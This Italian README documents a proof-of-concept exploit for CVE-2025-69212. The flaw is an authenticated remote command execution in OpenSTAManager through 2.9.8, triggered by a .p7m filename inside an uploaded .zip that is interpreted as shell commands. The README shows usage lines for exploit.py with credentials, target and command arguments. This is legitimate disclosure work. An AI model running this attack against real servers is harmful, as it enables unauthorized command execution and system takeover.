
CVE-2025-69212 Prova di concetto.
OpenSTAManager è una soluzione software gestionale per assistenza tecnica, fatturazione elettronica e contabilità. Le versioni <=2.9.8 sono vulnerabili a una vulnerabilità di esecuzione remota di codice autenticata. Un attaccante può sfruttare questo problema caricando un archivio .zip appositamente predisposto contenente un file .p7m il cui nome file può essere interpretato come comandi shell, consentendo l'esecuzione arbitraria di comandi sul server remoto.
$ pip install requests
$ python3 exploit.py [-h] --user USER --password PASSWORD [--target TARGET] [--cmd CMD]
Esempio:
$ python3 exploit.py --user="admin" --password="admin" --target="http://example.com/" --cmd="id"
-h, --help show this help message and exit
--user USER username for auth.
--password PASSWORD password for auth.
--target TARGET target domain endpoint
--cmd CMD command to execute on the server